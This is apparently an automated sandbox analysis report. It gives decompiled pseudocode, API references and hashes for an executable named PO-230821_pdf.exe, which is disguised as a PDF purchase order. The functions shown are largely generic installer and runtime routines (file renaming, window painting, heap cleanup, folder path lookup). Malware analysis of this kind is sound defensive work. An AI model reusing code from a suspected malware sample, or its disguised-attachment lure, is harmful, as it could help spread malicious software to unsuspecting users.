                                            										_t31 = _t31 - 1;
                                            										_t39 = _t39 - 1;
                                            									}
                                            									_t24 = _t49 - _t46 + 1;
                                            									_t48 =  *(_t53 + 0x18);
                                            									goto L17;
                                            								}
                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                            								_t42 = _t42 + 0xa;
                                            								goto L16;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					CloseHandle(E00406158(_t44, 0, 1));
                                            					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                            						goto L3;
                                            					}
                                            				}
                                            				return _t12;
                                            			}



















                                            0x004062ae
                                            0x004062b7
                                            0x004062be
                                            0x004062c8
                                            0x004062dc
                                            0x00406304
                                            0x0040630b
                                            0x0040630f
                                            0x00406313
                                            0x00406333
                                            0x0040633a
                                            0x00406344
                                            0x00406351
                                            0x00406356
                                            0x0040635b
                                            0x0040635f
                                            0x0040636e
                                            0x00406370
                                            0x0040637d
                                            0x00406381
                                            0x0040641c
                                            0x00000000
                                            0x00406397
                                            0x004063a4
                                            0x004063c8
                                            0x004063cc
                                            0x004063eb
                                            0x004063ef
                                            0x004063ef
                                            0x004063f1
                                            0x004063fa
                                            0x00406405
                                            0x00406410
                                            0x00406416
                                            0x00000000
                                            0x00406416
                                            0x004063ce
                                            0x004063d1
                                            0x004063dc
                                            0x004063d8
                                            0x004063da
                                            0x004063db
                                            0x004063db
                                            0x004063e3
                                            0x004063e5
                                            0x00000000
                                            0x004063e5
                                            0x004063af
                                            0x004063b5
                                            0x00000000
                                            0x004063b5
                                            0x00406381
                                            0x0040635f
                                            0x004062de
                                            0x004062e9
                                            0x004062f2
                                            0x004062f6
                                            0x00000000
                                            0x00000000
                                            0x004062f6
                                            0x00406427

                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                            • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                            • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                            • wsprintfA.USER32 ref: 0040632D
                                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                            • GlobalFree.KERNEL32(00000000), ref: 00406416
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                              • Part of subcall function 00406158: GetFileAttributesW.KERNEL32(00000003,00403113,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 0040615C
                                              • Part of subcall function 00406158: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                            • API String ID: 2171350718-2295842750
                                            • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                            • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                            				struct tagLOGBRUSH _v16;
                                            				struct tagRECT _v32;
                                            				struct tagPAINTSTRUCT _v96;
                                            				struct HDC__* _t70;
                                            				struct HBRUSH__* _t87;
                                            				struct HFONT__* _t94;
                                            				long _t102;
                                            				signed int _t126;
                                            				struct HDC__* _t128;
                                            				intOrPtr _t130;
                                            
                                            				if(_a8 == 0xf) {
                                            					_t130 =  *0x42a270;
                                            					_t70 = BeginPaint(_a4,  &_v96);
                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                            					_a8 = _t70;
                                            					GetClientRect(_a4,  &_v32);
                                            					_t126 = _v32.bottom;
                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                            					while(_v32.top < _t126) {
                                            						_a12 = _t126 - _v32.top;
                                            						asm("cdq");
                                            						asm("cdq");
                                            						asm("cdq");
                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                            						_t87 = CreateBrushIndirect( &_v16);
                                            						_v32.bottom = _v32.bottom + 4;
                                            						_a16 = _t87;
                                            						FillRect(_a8,  &_v32, _t87);
                                            						DeleteObject(_a16);
                                            						_v32.top = _v32.top + 4;
                                            					}
                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                            						_a16 = _t94;
                                            						if(_t94 != 0) {
                                            							_t128 = _a8;
                                            							_v32.left = 0x10;
                                            							_v32.top = 8;
                                            							SetBkMode(_t128, 1);
                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                            							_a8 = SelectObject(_t128, _a16);
                                            							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                            							SelectObject(_t128, _a8);
                                            							DeleteObject(_a16);
                                            						}
                                            					}
                                            					EndPaint(_a4,  &_v96);
                                            					return 0;
                                            				}
                                            				_t102 = _a16;
                                            				if(_a8 == 0x46) {
                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                            				}
                                            				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                            			}













                                            0x0040100a
                                            0x00401039
                                            0x00401047
                                            0x0040104d
                                            0x00401051
                                            0x0040105b
                                            0x00401061
                                            0x00401064
                                            0x004010f3
                                            0x00401089
                                            0x0040108c
                                            0x004010a6
                                            0x004010bd
                                            0x004010cc
                                            0x004010cf
                                            0x004010d5
                                            0x004010d9
                                            0x004010e4
                                            0x004010ed
                                            0x004010ef
                                            0x004010ef
                                            0x00401100
                                            0x00401105
                                            0x0040110d
                                            0x00401110
                                            0x00401112
                                            0x00401118
                                            0x0040111f
                                            0x00401126
                                            0x00401130
                                            0x00401142
                                            0x00401156
                                            0x00401160
                                            0x00401165
                                            0x00401165
                                            0x00401110
                                            0x0040116e
                                            0x00000000
                                            0x00401178
                                            0x00401010
                                            0x00401013
                                            0x00401015
                                            0x0040101f
                                            0x0040101f
                                            0x00000000

                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 78%
                                            			E10001B02(void* __eax, void* __ebx) {
                                            				intOrPtr _t5;
                                            				intOrPtr _t6;
                                            				intOrPtr _t7;
                                            				LONG* _t8;
                                            				void* _t9;
                                            				void* _t14;
                                            				void* _t24;
                                            				intOrPtr* _t25;
                                            				intOrPtr* _t26;
                                            
                                            				_t14 = __ebx;
                                            				__imp__DecodePointer( *0x1000dc88);
                                            				_t25 =  *0x1000bee0; // 0x0
                                            				_t24 = __eax;
                                            				if(_t25 != 0) {
                                            					while( *_t25 != 0) {
                                            						E10002511( *_t25);
                                            						_t25 = _t25 + 4;
                                            						if(_t25 != 0) {
                                            							continue;
                                            						}
                                            						break;
                                            					}
                                            					_t25 =  *0x1000bee0; // 0x0
                                            				}
                                            				_push(_t14);
                                            				E10002511(_t25);
                                            				_t26 =  *0x1000bedc; // 0x0
                                            				 *0x1000bee0 = 0;
                                            				if(_t26 != 0) {
                                            					while( *_t26 != 0) {
                                            						E10002511( *_t26);
                                            						_t26 = _t26 + 4;
                                            						if(_t26 != 0) {
                                            							continue;
                                            						}
                                            						break;
                                            					}
                                            					_t26 =  *0x1000bedc; // 0x0
                                            				}
                                            				E10002511(_t26);
                                            				 *0x1000bedc = 0;
                                            				E10002511( *0x1000bed8);
                                            				_t5 = E10002511( *0x1000bed4);
                                            				 *0x1000bed8 = 0;
                                            				 *0x1000bed4 = 0;
                                            				if(_t24 != 0xffffffff) {
                                            					_t5 = E10002511(_t24);
                                            				}
                                            				__imp__EncodePointer(0);
                                            				 *0x1000dc88 = _t5;
                                            				_t6 =  *0x1000c7dc; // 0x0
                                            				if(_t6 != 0) {
                                            					E10002511(_t6);
                                            					 *0x1000c7dc = 0;
                                            				}
                                            				_t7 =  *0x1000c7e0; // 0x0
                                            				if(_t7 != 0) {
                                            					E10002511(_t7);
                                            					 *0x1000c7e0 = 0;
                                            				}
                                            				_t8 = InterlockedDecrement( *0x1000b4c4);
                                            				if(_t8 == 0) {
                                            					_t8 =  *0x1000b4c4; // 0x1000b7c0
                                            					if(_t8 != 0x1000b7c0) {
                                            						_t9 = E10002511(_t8);
                                            						 *0x1000b4c4 = 0x1000b7c0;
                                            						return _t9;
                                            					}
                                            				}
                                            				return _t8;
                                            			}












                                            0x10001b02
                                            0x10001b0a
                                            0x10001b10
                                            0x10001b16
                                            0x10001b1a
                                            0x10001b1c
                                            0x10001b23
                                            0x10001b29
                                            0x10001b2c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10001b2c
                                            0x10001b2e
                                            0x10001b2e
                                            0x10001b34
                                            0x10001b36
                                            0x10001b3b
                                            0x10001b44
                                            0x10001b4c
                                            0x10001b4e
                                            0x10001b54
                                            0x10001b5a
                                            0x10001b5d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10001b5d
                                            0x10001b5f
                                            0x10001b5f
                                            0x10001b66
                                            0x10001b71
                                            0x10001b77
                                            0x10001b82
                                            0x10001b8a
                                            0x10001b90
                                            0x10001b99
                                            0x10001b9c
                                            0x10001ba1
                                            0x10001ba3
                                            0x10001ba9
                                            0x10001bae
                                            0x10001bb5
                                            0x10001bb8
                                            0x10001bbe
                                            0x10001bbe
                                            0x10001bc4
                                            0x10001bcb
                                            0x10001bce
                                            0x10001bd4
                                            0x10001bd4
                                            0x10001be0
                                            0x10001be9
                                            0x10001beb
                                            0x10001bf7
                                            0x10001bfa
                                            0x10001c00
                                            0x00000000
                                            0x10001c00
                                            0x10001bf7
                                            0x10001c08

                                            APIs
                                            • DecodePointer.KERNEL32(?,00000001,100013FE,10009AB0,00000008,10001535,?,00000001,?,10009AD0,0000000C,100014D4,?,00000001,?), ref: 10001B0A
                                            • _free.LIBCMT ref: 10001B23
                                              • Part of subcall function 10002511: HeapFree.KERNEL32(00000000,00000000,?,1000196C,00000000,?,?,?,?,?,10002AFE,00000018,10009B80,00000008,10002A4C,?), ref: 10002525
                                              • Part of subcall function 10002511: GetLastError.KERNEL32(00000000,?,1000196C,00000000,?,?,?,?,?,10002AFE,00000018,10009B80,00000008,10002A4C,?,?), ref: 10002537
                                            • _free.LIBCMT ref: 10001B36
                                            • _free.LIBCMT ref: 10001B54
                                            • _free.LIBCMT ref: 10001B66
                                            • _free.LIBCMT ref: 10001B77
                                            • _free.LIBCMT ref: 10001B82
                                            • _free.LIBCMT ref: 10001B9C
                                            • EncodePointer.KERNEL32(00000000), ref: 10001BA3
                                            • _free.LIBCMT ref: 10001BB8
                                            • _free.LIBCMT ref: 10001BCE
                                            • InterlockedDecrement.KERNEL32 ref: 10001BE0
                                            • _free.LIBCMT ref: 10001BFA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: _free$Pointer$DecodeDecrementEncodeErrorFreeHeapInterlockedLast
                                            • String ID:
                                            • API String ID: 4264854383-0
                                            • Opcode ID: a02bd7c47bf02372d776e0292fe4aed2ec27893ba39b7060528d04548340d720
                                            • Instruction ID: ddbd43b9dfdbde684fc43420aedc0cf5c50bb6f1134a6dfe5db267dea2a7c236
                                            • Opcode Fuzzy Hash: a02bd7c47bf02372d776e0292fe4aed2ec27893ba39b7060528d04548340d720
                                            • Instruction Fuzzy Hash: E221CC36900E709FF741DF24DCD1A893BA4FB043E1311406AEA08933AEEBB0AD50CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                            				struct _ITEMIDLIST* _v8;
                                            				signed int _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				signed int _t44;
                                            				WCHAR* _t45;
                                            				signed char _t47;
                                            				signed int _t48;
                                            				short _t59;
                                            				short _t61;
                                            				short _t63;
                                            				void* _t71;
                                            				signed int _t77;
                                            				signed int _t78;
                                            				short _t81;
                                            				short _t82;
                                            				signed char _t84;
                                            				signed int _t85;
                                            				void* _t98;
                                            				void* _t104;
                                            				intOrPtr* _t105;
                                            				void* _t107;
                                            				WCHAR* _t108;
                                            				void* _t110;
                                            
                                            				_t107 = __esi;
                                            				_t104 = __edi;
                                            				_t71 = __ebx;
                                            				_t44 = _a8;
                                            				if(_t44 < 0) {
                                            					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                            				}
                                            				_push(_t71);
                                            				_push(_t107);
                                            				_push(_t104);
                                            				_t105 =  *0x42a298 + _t44 * 2;
                                            				_t45 = 0x428200;
                                            				_t108 = 0x428200;
                                            				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                            					_t108 = _a4;
                                            					_a4 = _a4 & 0x00000000;
                                            				}
                                            				_t81 =  *_t105;
                                            				_a8 = _t81;
                                            				if(_t81 == 0) {
                                            					L43:
                                            					 *_t108 =  *_t108 & 0x00000000;
                                            					if(_a4 == 0) {
                                            						return _t45;
                                            					}
                                            					return E00406668(_a4, _t45);
                                            				} else {
                                            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                            						_t98 = 2;
                                            						_t105 = _t105 + _t98;
                                            						if(_t81 >= 4) {
                                            							if(__eflags != 0) {
                                            								 *_t108 = _t81;
                                            								_t108 = _t108 + _t98;
                                            								__eflags = _t108;
                                            							} else {
                                            								 *_t108 =  *_t105;
                                            								_t108 = _t108 + _t98;
                                            								_t105 = _t105 + _t98;
                                            							}
                                            							L42:
                                            							_t82 =  *_t105;
                                            							_a8 = _t82;
                                            							if(_t82 != 0) {
                                            								_t81 = _a8;
                                            								continue;
                                            							}
                                            							goto L43;
                                            						}
                                            						_t84 =  *((intOrPtr*)(_t105 + 1));
                                            						_t47 =  *_t105;
                                            						_t48 = _t47 & 0x000000ff;
                                            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                            						_t85 = _t84 & 0x000000ff;
                                            						_v28 = _t48 | 0x00008000;
                                            						_t77 = 2;
                                            						_v16 = _t85;
                                            						_t105 = _t105 + _t77;
                                            						_v24 = _t48;
                                            						_v20 = _t85 | 0x00008000;
                                            						if(_a8 != _t77) {
                                            							__eflags = _a8 - 3;
                                            							if(_a8 != 3) {
                                            								__eflags = _a8 - 1;
                                            								if(__eflags == 0) {
                                            									__eflags = (_t48 | 0xffffffff) - _v12;
                                            									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                            								}
                                            								L38:
                                            								_t108 =  &(_t108[lstrlenW(_t108)]);
                                            								_t45 = 0x428200;
                                            								goto L42;
                                            							}
                                            							_t78 = _v12;
                                            							__eflags = _t78 - 0x1d;
                                            							if(_t78 != 0x1d) {
                                            								__eflags = (_t78 << 0xb) + 0x42b000;
                                            								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                            							} else {
                                            								E004065AF(_t108,  *0x42a268);
                                            							}
                                            							__eflags = _t78 + 0xffffffeb - 7;
                                            							if(__eflags < 0) {
                                            								L29:
                                            								E004068EF(_t108);
                                            							}
                                            							goto L38;
                                            						}
                                            						if( *0x42a2e4 != 0) {
                                            							_t77 = 4;
                                            						}
                                            						_t121 = _t48;
                                            						if(_t48 >= 0) {
                                            							__eflags = _t48 - 0x25;
                                            							if(_t48 != 0x25) {
                                            								__eflags = _t48 - 0x24;
                                            								if(_t48 == 0x24) {
                                            									GetWindowsDirectoryW(_t108, 0x400);
                                            									_t77 = 0;
                                            								}
                                            								while(1) {
                                            									__eflags = _t77;
                                            									if(_t77 == 0) {
                                            										goto L26;
                                            									}
                                            									_t59 =  *0x42a264;
                                            									_t77 = _t77 - 1;
                                            									__eflags = _t59;
                                            									if(_t59 == 0) {
                                            										L22:
                                            										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                            										__eflags = _t61;
                                            										if(_t61 != 0) {
                                            											L24:
                                            											 *_t108 =  *_t108 & 0x00000000;
                                            											__eflags =  *_t108;
                                            											continue;
                                            										}
                                            										__imp__SHGetPathFromIDListW(_v8, _t108);
                                            										_a8 = _t61;
                                            										__imp__CoTaskMemFree(_v8);
                                            										__eflags = _a8;
                                            										if(_a8 != 0) {
                                            											goto L26;
                                            										}
                                            										goto L24;
                                            									}
                                            									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                            									__eflags = _t63;
                                            									if(_t63 == 0) {
                                            										goto L26;
                                            									}
                                            									goto L22;
                                            								}
                                            								goto L26;
                                            							}
                                            							GetSystemDirectoryW(_t108, 0x400);
                                            							goto L26;
                                            						} else {
                                            							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                            							if( *_t108 != 0) {
                                            								L27:
                                            								if(_v16 == 0x1a) {
                                            									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                            								}
                                            								goto L29;
                                            							}
                                            							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                            							L26:
                                            							if( *_t108 == 0) {
                                            								goto L29;
                                            							}
                                            							goto L27;
                                            						}
                                            					}
                                            					goto L43;
                                            				}
                                            			}





























                                            0x004066a5
                                            0x004066a5
                                            0x004066a5
                                            0x004066ab
                                            0x004066b0
                                            0x004066c1
                                            0x004066c1
                                            0x004066c9
                                            0x004066ca
                                            0x004066cb
                                            0x004066cc
                                            0x004066cf
                                            0x004066d7
                                            0x004066d9
                                            0x004066ea
                                            0x004066ed
                                            0x004066ed
                                            0x004066f1
                                            0x004066f7
                                            0x004066fa
                                            0x004068d5
                                            0x004068d5
                                            0x004068e0
                                            0x004068ec
                                            0x004068ec
                                            0x00000000
                                            0x00406700
                                            0x00406705
                                            0x0040671a
                                            0x0040671b
                                            0x00406721
                                            0x004068b3
                                            0x004068c1
                                            0x004068c4
                                            0x004068c4
                                            0x004068b5
                                            0x004068b8
                                            0x004068bb
                                            0x004068bd
                                            0x004068bd
                                            0x004068c6
                                            0x004068c6
                                            0x004068cc
                                            0x004068cf
                                            0x00406702
                                            0x00000000
                                            0x00406702
                                            0x00000000
                                            0x004068cf
                                            0x00406727
                                            0x0040672a
                                            0x00406739
                                            0x00406740
                                            0x0040674c
                                            0x0040674f
                                            0x00406752
                                            0x00406753
                                            0x00406758
                                            0x0040675e
                                            0x00406761
                                            0x00406764
                                            0x00406857
                                            0x0040685c
                                            0x0040688f
                                            0x00406894
                                            0x00406899
                                            0x0040689e
                                            0x0040689e
                                            0x004068a3
                                            0x004068a9
                                            0x004068ac
                                            0x00000000
                                            0x004068ac
                                            0x0040685e
                                            0x00406861
                                            0x00406864
                                            0x00406879
                                            0x00406880
                                            0x00406866
                                            0x0040686d
                                            0x0040686d
                                            0x00406888
                                            0x0040688b
                                            0x0040684f
                                            0x00406850
                                            0x00406850
                                            0x00000000
                                            0x0040688b
                                            0x00406771
                                            0x00406775
                                            0x00406775
                                            0x00406776
                                            0x00406778
                                            0x004067b5
                                            0x004067b8
                                            0x004067c8
                                            0x004067cb
                                            0x004067d3
                                            0x004067d9
                                            0x004067d9
                                            0x00406834
                                            0x00406834
                                            0x00406836
                                            0x00000000
                                            0x00000000
                                            0x004067dd
                                            0x004067e2
                                            0x004067e3
                                            0x004067e5
                                            0x004067fc
                                            0x0040680a
                                            0x00406810
                                            0x00406812
                                            0x00406830
                                            0x00406830
                                            0x00406830
                                            0x00000000
                                            0x00406830
                                            0x00406818
                                            0x00406821
                                            0x00406824
                                            0x0040682a
                                            0x0040682e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040682e
                                            0x004067f6
                                            0x004067f8
                                            0x004067fa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004067fa
                                            0x00000000
                                            0x00406834
                                            0x004067c0
                                            0x00000000
                                            0x0040677a
                                            0x00406798
                                            0x004067a1
                                            0x0040683e
                                            0x00406842
                                            0x0040684a
                                            0x0040684a
                                            0x00000000
                                            0x00406842
                                            0x004067ab
                                            0x00406838
                                            0x0040683c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040683c
                                            0x00406778
                                            0x00000000
                                            0x00406705

                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(Fosklcks,00000400), ref: 004067C0
                                            • GetWindowsDirectoryW.KERNEL32(Fosklcks,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                            • lstrcatW.KERNEL32(Fosklcks,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                            • lstrlenW.KERNEL32(Fosklcks,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd
                                            Similarity
                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                            • String ID: Fosklcks$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 4260037668-1365280483
                                            • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                            • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                            • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                            • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E10001EE4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                            				signed int* _t81;
                                            				void* _t86;
                                            				long _t90;
                                            				intOrPtr _t94;
                                            				signed int _t98;
                                            				signed int _t99;
                                            				signed char _t103;
                                            				intOrPtr* _t105;
                                            				intOrPtr _t106;
                                            				intOrPtr* _t109;
                                            				signed char _t111;
                                            				long _t119;
                                            				signed int _t130;
                                            				signed int* _t134;
                                            				intOrPtr _t135;
                                            				signed int* _t138;
                                            				void** _t139;
                                            				intOrPtr _t141;
                                            				void* _t142;
                                            				signed int _t143;
                                            				void** _t147;
                                            				signed int _t149;
                                            				void* _t150;
                                            				void** _t154;
                                            				void* _t155;
                                            
                                            				_push(0x64);
                                            				_push(0x10009b60);
                                            				E10002840(__ebx, __edi, __esi);
                                            				E10002A35(0xb);
                                            				_t130 = 0;
                                            				 *(_t155 - 4) = 0;
                                            				if( *0x1000db80 == 0) {
                                            					_push(0x40);
                                            					_t141 = 0x20;
                                            					_push(_t141);
                                            					_t81 = E10002720();
                                            					_t134 = _t81;
                                            					 *(_t155 - 0x24) = _t134;
                                            					if(_t134 != 0) {
                                            						 *0x1000db80 = _t81;
                                            						 *0x1000db64 = _t141;
                                            						while(_t134 <  &(_t81[0x200])) {
                                            							_t134[1] = 0xa00;
                                            							 *_t134 =  *_t134 | 0xffffffff;
                                            							_t134[2] = _t130;
                                            							_t134[9] = _t134[9] & 0x00000080;
                                            							_t134[9] = _t134[9] & 0x0000007f;
                                            							_t134[9] = 0xa0a;
                                            							_t134[0xe] = _t130;
                                            							_t134[0xd] = _t130;
                                            							_t134 =  &(_t134[0x10]);
                                            							 *(_t155 - 0x24) = _t134;
                                            							_t81 =  *0x1000db80;
                                            						}
                                            						GetStartupInfoW(_t155 - 0x74);
